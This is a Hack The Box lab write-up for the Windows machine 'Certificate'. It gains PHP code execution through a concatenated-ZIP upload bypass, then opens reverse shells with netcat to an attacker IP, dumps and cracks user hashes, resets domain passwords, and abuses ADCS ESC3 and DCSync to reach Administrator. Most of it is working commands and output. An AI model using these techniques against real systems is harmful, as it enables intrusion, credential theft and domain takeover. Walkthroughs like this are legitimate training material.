Hack The Box / WINDOWS / 2025-06-07
Hack The Box — Certificate (Windows)
Bypass file-upload filtering with concatenated ZIP polyglot to gain PHP RCE, extract webapp credentials and crack domain user hashes, then abuse ADCS ESC3 to impersonate DC01$ and compromise Administrator.
Target
- IP: 10.10.11.71
Recon
sudo nmap -sC -sV 10.10.11.71 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-02 21:45:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after: 2025-11-04T03:14:54
| MD5: 0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
|_ssl-date: 2025-06-02T21:46:38+00:00; +8h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after: 2025-11-04T03:14:54
| MD5: 0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
|_ssl-date: 2025-06-02T21:46:38+00:00; +8h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T21:46:38+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after: 2025-11-04T03:14:54
| MD5: 0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T21:46:38+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after: 2025-11-04T03:14:54
| MD5: 0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add certificate.htb and dc01.certificate.htb to /etc/hosts.
Note the +8h00m01s clock offset nmap reports on the TLS ports: Kerberos tolerates at most 5 minutes of skew, so if that offset is real (and not just the scanner's timezone), the Kerberos-based steps later on need the local clock synced (for example with ntpdate against 10.10.11.71) or the tools run under faketime.
Go to http://certificate.htb/.
It is a PHP website.
curl -v http://certificate.htb/
Server header says: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30.
Register with any user and log in.
Go to courses.php, choose a random course, click enroll. Quizzes appear below.
Click a quiz.
There is an upload form saying:
Please select the assignment file you want to upload (the file will be reviewed by the course instructor)
We accept only the following file types: .pdf .docx .pptx .xlsx
You include the assignment file in .zip archive file to reduce it's size
By testing:
- It accepts direct .pdf, .docx, .pptx uploads, but not .xlsx
- It accepts a .zip containing a single file, and that file must have extension .pdf, .docx, or .pptx
By interacting with this form:
- If we upload .pdf, .docx, or .pptx, the file goes to uploads/<some_hash>/<filename>
- If we upload a zip, it extracts and uploads the file inside that folder
- If we upload a zip with more than one file, files are not uploaded and the server returns an empty response
I tried several attacks. Zip Slip does not work.
Interesting behavior: if we upload a file named for example test.php:test.pdf, an empty file test.php is created.
This is because NTFS supports Alternate Data Streams (ADS): the part after the colon is a stream name, so the extension check sees .pdf, while the file system creates test.php and writes the uploaded bytes into its test.pdf stream. The main (unnamed) data stream, which is what Apache serves, stays empty.
Useful link:
- https://blog.netwrix.com/2022/12/16/alternate_data_stream/
However, with this trick we only create an empty .php file, so it is not enough.
Finally, the working attack is what we can call zip concatenation: build a single file by concatenating two valid zip files.
Parsers disagree on such a file. The ZIP format is indexed from its end (the end-of-central-directory record points at the central directory), so a reader that honours that index sees only the last archive, while a reader that walks the local file headers from the start of the file sees only the first archive. When the validation step and the extraction step use different readers, the archive that passes validation is not the one that gets extracted.
Useful link:
- https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/
Attack idea in this case:
- one zip with a .pdf file (allowed extension) so validation passes
- one zip with a .php file; validation ignores this one, but extraction processes it
We can create the zip with this bash script (also saved as attachments/gen_zip.sh):
#!/bin/bash
# Build a.zip from two independent archives: the first holds the decoy .pdf,
# the second the PHP payload. -f so leftovers from a previous run are not an error.
rm -f a.zip tmp1.zip tmp2.zip
echo 'first' > first.pdf
echo '<?php phpinfo(); ?>' > second.php
zip tmp1.zip first.pdf
zip tmp2.zip second.php
# The concatenation is the whole trick: which archive a parser sees depends on how it indexes the file.
cat tmp1.zip tmp2.zip > a.zip
Run the script.
We get a.zip.
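Why the two halves of a.zip are seen differently, as an added example that is not part of the original writeup and not the target application's code: the script below builds the same two-archive file as gen_zip.sh in memory and then reads it twice, once with a hand-written scanner that walks local file headers from offset 0 (it stops at the first archive's central directory and reports only first.pdf) and once with Python's zipfile, which locates the end-of-central-directory record at the end of the file and therefore reports only second.php. Which of these two views the target's validation and extraction code take is not known from the page; the entry contents are constructed for the demo.

```python
import io
import struct
import zipfile

# Fixed-size part of a ZIP local file header (30 bytes, little-endian):
# signature, version, flags, method, mtime, mdate, crc32, csize, usize, name len, extra len
LOCAL_SIG = b"PK\x03\x04"
LOCAL_HDR = "<4sHHHHHIIIHH"
LOCAL_HDR_LEN = struct.calcsize(LOCAL_HDR)  # 30


def build_archive(name: str, content: bytes) -> bytes:
    """Return a single-entry, uncompressed ZIP archive as bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, content)
    return buf.getvalue()


def build_concatenated_zip() -> bytes:
    """Same idea as gen_zip.sh: archive(first.pdf) followed by archive(second.php).

    Contents are constructed for this demo; the .php body is the phpinfo() probe
    used in the writeup.
    """
    decoy = build_archive("first.pdf", b"first\n")
    payload = build_archive("second.php", b"<?php phpinfo(); ?>\n")
    return decoy + payload


def forward_scan_names(data: bytes) -> list[str]:
    """Names seen by a reader that walks local file headers from offset 0.

    It stops at the first record that is not a local file header, which is the
    first archive's central directory, so it never reaches the second archive.
    """
    names = []
    off = 0
    while data[off:off + 4] == LOCAL_SIG:
        fields = struct.unpack_from(LOCAL_HDR, data, off)
        flags, csize, name_len, extra_len = fields[2], fields[7], fields[9], fields[10]
        if flags & 0x0008:
            # Data-descriptor entries carry their sizes after the data; not handled here.
            raise ValueError("streamed entry without sizes in the local header")
        name_start = off + LOCAL_HDR_LEN
        names.append(data[name_start:name_start + name_len].decode("utf-8"))
        off = name_start + name_len + extra_len + csize
    return names


def eocd_view_names(data: bytes) -> list[str]:
    """Names seen by a reader that trusts the end-of-central-directory record.

    zipfile searches for the EOCD from the end of the file, resolves the second
    archive's central directory and treats everything before it as prepended
    data (the same handling that makes self-extracting EXEs readable).
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    blob = build_concatenated_zip()
    with open("a.zip", "wb") as f:
        f.write(blob)
    print("forward scan sees:", forward_scan_names(blob))   # ['first.pdf']
    print("EOCD reader sees: ", eocd_view_names(blob))      # ['second.php']
```

Running it writes an a.zip equivalent to the one produced by gen_zip.sh and prints the two disagreeing views. The same check is a cheap way to test any upload handler you own: if the name list from a forward scan and the name list from the library you extract with differ, the validator and the extractor are not looking at the same archive.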
Upload this zip.
The site shows something like:
File uploaded successfully!. You can check your uploaded assignment file(in case you want to re-upload it or do some changes) HERE
Where HERE is a link such as:
http://certificate.htb/static/uploads/104b78fcf316857f7d1c1b58a30c3e4c/first.pdf
If we visit that link, we get 404, so first.pdf was not uploaded.
But if we visit:
http://certificate.htb/static/uploads/104b78fcf316857f7d1c1b58a30c3e4c/second.php
we see second.php was uploaded, and we get the full phpinfo() output.
Now we can test RCE.
Put system("whoami") in second.php, recreate zip, upload again, and visit second.php.
We get:
certificate\xamppuser
Now get a reverse shell.
Go to revshells.com.
Generate a base64 PowerShell reverse shell.
Put payload in system() in PHP.
Listen with netcat:
rlwrap nc -vlnp 4444
Repeat upload procedure, visit second.php, and we get a reverse shell.
In this reverse shell we do not see errors (stderr is not returned to us), so we get a better shell using nc64.exe.
Download it:
wget https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Start Python HTTP server and netcat listener:
python3 -m http.server 8000
rlwrap nc -vlnp 4444
On target machine, run:
cd C:\xampp\htdocs
curl http://10.10.14.157:8000/nc64.exe -o nc64.exe
.\nc64.exe -e cmd.exe 10.10.14.157 4444
We get a reverse shell.
Switch to PowerShell:
powershell
cd C:\xampp\htdocs\certificate.htb
type db.php
We notice:
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
We have a password.
MySQL is exposed only on localhost, so to access it we try chisel.
Download chisel for Linux and Windows:
- https://github.com/jpillora/chisel
Upload Windows chisel to target machine.
On attacker machine:
./chisel_linux server --reverse --port 5555
On target machine:
.\chisel_windows.exe client http://10.10.14.157:5555 R:3306
Bad news: antivirus is active and blocks chisel execution as malware.
Try to check AV exclusions (Defender logs configuration changes, exclusions included, as event ID 5007):
Get-WinEvent -LogName 'Microsoft-Windows-Windows Defender/Operational' -FilterXPath "*[System[(EventID=5007)]]" | Where-Object { $_.Message -like "*exclusion*" } | Select-Object Message | FL
We do not have permissions to read logs.
Actually, to retrieve all user data we can use a PHP script that dumps the users table from the DB.
In db.php there is DB connection code.
In login.php the users table is indicated.
We can use this script:
<?php
// Database connection using PDO
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
die('Database connection failed: ' . $e->getMessage());
}
$stmt = $pdo->prepare('SELECT * FROM Users');
$stmt->execute();
// Fetch and display results
$users = $stmt->fetchAll();
echo "<pre>";
foreach ($users as $user) {
print_r($user);
}
echo "</pre>";
?>
Put this into second.php.
Repeat previous upload procedure and visit second.php.
We get user data.
In particular, the usernames and passwords of interest are:
Lorra.AAA:$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
Sara1200:$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
Johney:$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww:$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
stev:$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
Try cracking them.
Put those user:hash lines in a file named hash (-m 3200 is bcrypt; --username tells hashcat to skip the user: prefix).
Note the cost factor in $2y$04$: 04 is the minimum bcrypt cost (2^4 = 16 rounds), so a wordlist attack finishes quickly here, whereas a sane cost of 10 or more would make this step far slower.
./hashcat-6.2.6/hashcat.bin -a 0 -m 3200 ./hash ./rockyou.txt --username
./hashcat-6.2.6/hashcat.bin -a 0 -m 3200 ./hash ./rockyou.txt --username --show
We get:
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182
In C:\Users there are these folders:
d----- 12/30/2024 8:33 PM Administrator
d----- 11/23/2024 6:59 PM akeder.kh
d----- 11/4/2024 12:55 AM Lion.SK
d-r--- 11/3/2024 1:05 AM Public
d----- 11/3/2024 7:26 PM Ryan.K
d----- 11/26/2024 4:12 PM Sara.B
d----- 12/29/2024 5:30 PM xamppuser
It seems we got Sara's password.
nxc smb dc01.certificate.htb -u 'Sara.B' -p 'Blink182'
SMB 10.10.11.71 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.71 445 DC01 [+] certificate.htb\Sara.B:Blink182
It works.
Get shares:
nxc smb dc01.certificate.htb -u 'Sara.B' -p 'Blink182' --shares
SMB 10.10.11.71 445 DC01 Share Permissions Remark
SMB 10.10.11.71 445 DC01 ----- ----------- ------
SMB 10.10.11.71 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.71 445 DC01 C$ Default share
SMB 10.10.11.71 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.71 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.71 445 DC01 SYSVOL READ Logon server share
Nothing interesting there.
evil-winrm -i dc01.certificate.htb -u 'Sara.B' -p 'Blink182'
We get a PowerShell shell as Sara.B.
ldapdomaindump certificate.htb -u 'certificate.htb\Sara.B' -p 'Blink182'
In domain_computers.json we notice:
CN SAM Name DNS Hostname Operating System Service Pack OS Version lastLogon Flags Created on SID description
WS-05 WS-05$ WS-05.certificate.htb Windows Server 2019 Standard Evaluation 10.0 (17763) 12/31/24 02:16:57 WORKSTATION_ACCOUNT 12/30/24 21:29:46 1131
WS-01 WS-01$ WS-01.certificate.htb Windows Server 2019 Standard Evaluation 10.0 (17763) 11/27/24 06:11:39 WORKSTATION_ACCOUNT 11/03/24 22:49:39 1103
DC01 DC01$ DC01.certificate.htb Windows Server 2019 Datacenter 10.0 (17763) 06/08/25 17:52:04 SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION 11/03/24 09:24:32 1000
So besides the DC there are two other computers.
Get list of users:
nxc smb dc01.certificate.htb -d certificate.htb -u 'Sara.B' -p 'Blink182' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users_2.txt
bloodhound-python -u 'Sara.B' -p 'Blink182' -ns 10.10.11.71 -d 'certificate.htb' -dc dc01.certificate.htb -c All --zip
We get a zip.
sudo bloodhound
Upload the zip.
Back to Sara.B Evil-WinRM shell:
cd C:\Users\Sara.B\Documents
ls
We notice folder WS-01.
cd WS-01
ls
-a---- 11/4/2024 12:44 AM 530 Description.txt
-a---- 11/4/2024 12:45 AM 296660 WS-01_PktMon.pcap
type Description.txt
The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!
We want to download the pcap.
Use smbserver.
On attacker machine:
smbserver.py -smb2support -username test12 -password test12 share $(pwd)
On target machine:
net use \\10.10.14.157\share test12 /USER:test12
cp WS-01_PktMon.pcap \\10.10.14.157\share
Open the pcap in Wireshark.
Download PCredz:
- https://github.com/lgandx/PCredz
python3 ./Pcredz -f ../WS-01_PktMon.pcap
Pcredz 2.0.2
Author: Laurent Gaffie <lgaffie@secorizon.com>
This script will extract NTLM (HTTP,LDAP,SMB,MSSQL,RPC, etc), Kerberos,
FTP, HTTP Basic and credit card data from a given pcap file or from a live interface.
CC number scanning activated
Unknown format, trying TCPDump format
protocol: tcp 192.168.56.128:49712 > 192.168.56.101:445
NTLMv2 complete hash is: Administrator::WS-01:0f18018782d74f...
../WS-01_PktMon.pcap parsed in: 0.0959 seconds (File size 0.283 Mo).
It does not crack.
Useful site:
- https://notes.benheater.com/books/active-directory/page/extracting-secrets-from-pcaps
sudo apt install mono-devel
Download NetworkMiner and extract it:
- https://www.netresec.com/?page=NetworkMiner
mono NetworkMiner.exe
We cannot open WS-01_PktMon.pcap directly: despite its extension the file is pcapng (file WS-01_PktMon.pcap confirms it), and analyzing pcapng requires the professional version of NetworkMiner.
But we can convert pcapng to pcap with editcap, which ships with Wireshark.
cp WS-01_PktMon.pcap.original WS-01_PktMon.pcapng
editcap -F libpcap WS-01_PktMon.pcapng output.pcap
Now NetworkMiner can open the pcap.
Go to the credentials tab.
There are two krb5pa credentials for user Lion.SK.
Take the first one.
Right click --> copy password.
Put it in file hash.
Use John the Ripper to crack it:
./john/run/john --wordlist=rockyou.txt ./hash
We get password:
!QAZ2wsx
From BloodHound we see Sara.B is in group Account Operators, which has GenericAll over most non-protected users and groups in the domain, including Lion.SK. (Protected principals such as Domain Admins are excluded by AdminSDHolder, so this is not a direct path to admin.)
Download repository:
- https://github.com/CravateRouge/bloodyAD.git
python3 bloodyAD/bloodyAD.py --host 'dc01.certificate.htb' -d certificate.htb --dc-ip 10.10.11.71 -u 'Sara.B' -p 'Blink182' set password 'Lion.SK' '!Kali12345678!'
[+] Password changed successfully!
evil-winrm -i dc01.certificate.htb -u 'Lion.SK' -p '!Kali12345678!'
We get a PowerShell shell as Lion.SK.
We can retrieve the user flag.
certipy find -dc-ip 10.10.11.71 -u Lion.SK -p '!Kali12345678!' -target certificate.htb -text -stdout -vulnerable
Certificate Authorities
0
CA Name : Certificate-LTD-CA
DNS Name : DC01.certificate.htb
Certificate Subject : CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Serial Number : 75B2F4BBF31F108945147B466131BDCA
Certificate Validity Start : 2024-11-03 22:55:09+00:00
Certificate Validity End : 2034-11-03 23:05:09+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CERTIFICATE.HTB\Administrators
Access Rights
ManageCa : CERTIFICATE.HTB\Administrators
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
ManageCertificates : CERTIFICATE.HTB\Administrators
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Enroll : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
0
Template Name : Delegated-CRA
Display Name : Delegated-CRA
Certificate Authorities : Certificate-LTD-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectAltRequireEmail
SubjectRequireEmail
SubjectRequireDirectoryPath
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollment
Private Key Flag : ExportableKey
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-05T19:52:09+00:00
Template Last Modified : 2024-11-05T19:52:10+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFICATE.HTB\Domain CRA Managers
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFICATE.HTB\Administrator
Full Control Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Owner Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Dacl Principals : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Write Property Enroll : CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
[+] User Enrollable Principals : CERTIFICATE.HTB\Domain CRA Managers
[!] Vulnerabilities
ESC3 : Template has Certificate Request Agent EKU set.
ESC3 attack is possible.
Useful site:
- https://www.rbtsec.com/blog/active-directory-certificate-services-adcs-esc3/
Users in Domain CRA Managers can enroll in template Delegated-CRA.
From BloodHound we see Lion.SK is in Domain CRA Managers.
Most ESC3 writeups eventually use template User.
certipy find -dc-ip 10.10.11.71 -u Lion.SK -p '!Kali12345678!' -target certificate.htb -text
This shows the various templates.
We notice User template is not enabled. But template Machine is enabled.
In particular, Machine allows client authentication and Domain Computers can enroll, so WS-01$ and WS-05$ can enroll.
From BloodHound we see Sara.B has GenericAll over WS-01$, WS-05$, and Domain CRA Managers.
Attack idea:
- add a machine account (for example WS-01$) to Domain CRA Managers
- change the machine account password
- perform ESC3
python3 bloodyAD/bloodyAD.py --host 'dc01.certificate.htb' -d certificate.htb --dc-ip 10.10.11.71 -u 'Sara.B' -p 'Blink182' add groupMember 'Domain CRA Managers' 'WS-01$'
[+] WS-01$ added to Domain CRA Managers
python3 bloodyAD/bloodyAD.py --host 'dc01.certificate.htb' -d certificate.htb --dc-ip 10.10.11.71 -u 'Sara.B' -p 'Blink182' set password 'WS-01$' '!Kali12345678!'
[+] Password changed successfully!
We also have to set the mail attribute of WS-01$: the Delegated-CRA template has the SubjectAltRequireEmail and SubjectRequireEmail name flags, so the CA builds the subject from the enrollee's mail attribute and rejects the request if it is empty.
python3 bloodyAD/bloodyAD.py --host 'dc01.certificate.htb' -d certificate.htb --dc-ip 10.10.11.71 -u 'Sara.B' -p 'Blink182' set object 'WS-01$' mail -v 'WS-01$@certificate.htb'
[+] WS-01$'s mail has been updated
Now we can request the certificate:
certipy req -ca Certificate-LTD-CA -dc-ip 10.10.11.71 -u 'WS-01$@certificate.htb' -p '!Kali12345678!' -template Delegated-CRA -target dc01.certificate.htb
[*] Saving certificate and private key to 'ws-01.pfx'
[*] Wrote certificate and private key to 'ws-01.pfx'
If we try requesting a certificate on-behalf-of Administrator, we get:
[-] Got error while requesting certificate: code: 0x8009480f - CERTSRV_E_SUBJECT_DNS_REQUIRED - The Domain Name System (DNS) name is unavailable and cannot be added to the Subject Alternate name.
This is because the Machine template builds the SAN from the account's dNSHostName attribute, which user accounts do not have; only machine accounts do.
So we request a certificate on behalf of a machine account instead, and the most valuable one is DC01$.
Request certificate for DC01$:
certipy req -ca Certificate-LTD-CA -dc-ip 10.10.11.71 -u 'WS-01$@certificate.htb' -p '!Kali12345678!' -template Machine -dns 'DC01.certificate.htb' -target dc01.certificate.htb -on-behalf-of 'CERTIFICATE\DC01$' -pfx ws-01.pfx
certipy auth -dc-ip 10.10.11.71 -pfx dc01.pfx
[*] Saving credential cache to 'dc01.ccache'
[*] Wrote credential cache to 'dc01.ccache'
[*] Trying to retrieve NT hash for 'dc01$'
[*] Got hash for 'dc01$@certificate.htb': aad3b435b51404eeaad3b435b51404ee:f36e0bc3c9a34c3acdb8b79df54f27cd
export KRB5CCNAME=dc01.ccache
nxc smb dc01.certificate.htb -k --use-kcache
SMB dc01.certificate.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB dc01.certificate.htb 445 DC01 [+] certificate.htb\dc01$ from ccache
DC01$ is a domain controller account and therefore holds the replication rights needed for DCSync, so the ticket is enough to dump NTDS secrets:
secretsdump.py -k -no-pass dc01.certificate.htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6:::
evil-winrm -i dc01.certificate.htb -u Administrator -H d804304519bf0143c14cbf1c024408c6
We get a PowerShell shell as Administrator.
We can retrieve the root flag.